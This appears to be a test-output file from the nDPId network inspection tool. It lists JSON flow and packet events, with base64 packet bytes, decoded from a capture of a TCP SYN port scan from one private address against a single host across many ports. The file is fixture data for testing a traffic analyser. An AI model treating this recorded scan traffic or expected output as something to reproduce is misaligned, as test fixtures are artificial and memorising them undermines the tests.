+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060116,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1073,"flow_packet_id":1,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060116,"pkt":"ACYLMQczACWzv5HuCABFAAAszUIAACcGVDCsEAAIQA2GNIzSDUzdUoMYAAAAAGACEAAbQwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1083,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1074,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5AAACsG2eKsEAAIQA2GNIzTB\/PdU4MZAAAAAGACEAAgmQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1075,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7zYAADIGJzysEAAIQA2GNIzTANPdU4MZAAAAAGACDAAruQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1076,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs7vQAACkGMH6sEAAIQA2GNIzTFxPdU4MZAAAAAGACCAAZeQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1086,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1077,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAswO4AADsGTISsEAAIQA2GNIzTBA3dU4MZAAAAAGACEAAkfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1078,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsw+IAADkGS5CsEAAIQA2GNIzTFvXdU4MZAAAAAGACCAAZlwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsxCgAAC4GVkqsEAAIQA2GNIzTE+7dU4MZAAAAAGACDAAYngAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1080,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs6TsAACUGOjesEAAIQA2GNIzTI3jdU4MZAAAAAGACCAANFAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1081,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ+IAAC4GspCsEAAIQA2GNIzTApvdU4MZAAAAAGACDAAp8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1091,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1082,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs+AoAACcGKWisEAAIQA2GNIzTJpbdU4MZAAAAAGACEAAB9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1083,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAs8zIAADAGJUCsEAAIQA2GNIzTFw7dU4MZAAAAAGACBAAdfgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060175,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1084,"flow_packet_id":1,"flow_last_seen":1278275060175,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060175,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTwAADgG2zasEAAIQA2GNIzTNdbdU4MZAAAAAGACBAD+tQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1094,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1085,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsX7wAAC4GurasEAAIQA2GNIzTBJbdU4MZAAAAAGACDAAn9gAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1086,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6oAADoGqsisEAAIQA2GNIzTQmDdU4MZAAAAAGACDADqKwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1087,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLpQAAC4G696sEAAIQA2GNIzTG2vdU4MZAAAAAGACDAARIQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1088,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsLP4AADcG5HSsEAAIQA2GNIzTsCzdU4MZAAAAAGACEAB4XwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1098,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAslywAADcGekasEAAIQA2GNIzTCU3dU4MZAAAAAGACEAAfPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1099,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsJf0AACsG93WsEAAIQA2GNIzTEV3dU4MZAAAAAGACEAAXLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsKjYAADIG7DysEAAIQA2GNIzTBvfdU4MZAAAAAGACDAAllQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsqE0AACYGeiWsEAAIQA2GNIzSA4bdUoMYAAAAAGACDAApCQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1093,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAst3MAADIGXv+sEAAIQA2GNIzSDmrdUoMYAAAAAGACDAAeJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1094,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAs8wcAACsGKmusEAAIQA2GNIzSH5ndUoMYAAAAAGACEAAI9gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAsHA8AADEG+2OsEAAIQA2GNIzSA\/LdUoMYAAAAAGACCAAsnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1096,"flow_packet_id":1,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060176,"pkt":"ACYLMQczACWzv5HuCABFAAAshBYAACgGnFysEAAIQA2GNIzSINLdUoMYAAAAAGACBAATvQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1097,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060176,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 